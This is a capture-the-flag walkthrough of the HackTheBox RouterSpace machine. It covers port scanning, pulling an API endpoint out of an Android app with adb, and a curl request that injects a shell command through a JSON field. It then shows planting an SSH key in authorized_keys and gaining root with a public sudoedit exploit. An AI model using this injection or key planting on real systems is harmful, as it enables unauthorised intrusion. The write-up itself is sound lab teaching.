RouterSpace — Hackthebox Walkthrough
This was a pretty cool box which included finding an endpoint from an APK file and then exploiting a Node application to get command execution. For the root part, we have to exploit the sudoedit vulnerability, which has been a pretty hot topic these days.
User
nmap reveals two open ports.
nmap --open -sC -sV 10.10.11.148
PORT STATE SERVICE REASON VERSION
22/tcp open tcpwrapped syn-ack
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
80/tcp open tcpwrapped syn-ack
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: RouterSpace
|_http-favicon: Unknown favicon MD5: 939407566E5C96D4EDF42DDDC4434FB3
|_http-trane-info: Problem with XML parsing of /evox/about
Looking at port 80, we see a static page.
This included a hyperlink to download an APK file.
http://10.10.11.148/RouterSpace.apk
I downloaded the file and did some static analysis. To be honest, this led me nowhere. So my only option was to install the APK on a device and see what it does.
I could have used Android Studio to start up an emulator to run this, but I used my old Android device. It was just easier for me. So I used adb to connect to the device. If you are not familiar with what adb is, check out this article where I talk about the basics of adb.
First, I installed the APK.
adb install RouterSpace.apk
I listed the packages to confirm it was installed fine.
adb shell pm list packages|grep router
Then I did a dumpsys of the application, which will simply give you information about the application.
adb shell dumpsys package com.routerspace
This gives us the activity name of the application which will help to start the application.
Then I invoked the application with the activity name I found.
adb shell am start -n com.routerspace/.MainActivity
NOTE: “All the steps after installing the APK could be done manually from the device itself, but I was more comfortable with adb.”
I was prompted with "Unable to connect to the server!" when I clicked the Check Status button. Since I didn’t know what the error was about, I thought of intercepting the traffic sent from the application and seeing what I could find.
For this, I configured a proxy with adb:
adb shell settings put global http_proxy 192.168.1.6:8080
Then I started a listener on port 8080 with nc -lvnp 8080 and then clicked the Check Status button again. I got a POST request in my listener.
It was a POST request to a new endpoint.
/api/v4/monitoring/router/dev/check/deviceAccess
I also saw there was some POST data being sent. I tried some basic injections with this and I was able to do command injection with this payload:
{'ip': '`id`'}
curl -X POST -H 'Content-Type: application/json' http://10.10.11.148/api/v4/monitoring/router/dev/check/deviceAccess -d '{"ip": "`id`"}' -H 'user-agent: RouterSpaceAgent' -H 'Host: routerspace.htb'
I added my SSH private key to the authorized_keys file and then SSHed in.
echo "ssh-rsa ...<SNIP>..." >> ~/.ssh/authorized_keys
Root
Doing some basic enumeration, I found out that the version of sudo in use was 1.8.31 with:
sudo --version
I knew this was vulnerable to the sudoedit sudo vulnerability which came out recently.
With a little googling I found a GitHub repo which I could use to exploit this.
I followed the steps mentioned in the repo. First, I transferred the exploit.c, shellcode.c and Makefile files to the box. Then I used the make command to compile the C file.
Then I simply executed the exploit binary and I got a shell as root.
./exploit
Rooted!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518
Happy Hacking !!! 😄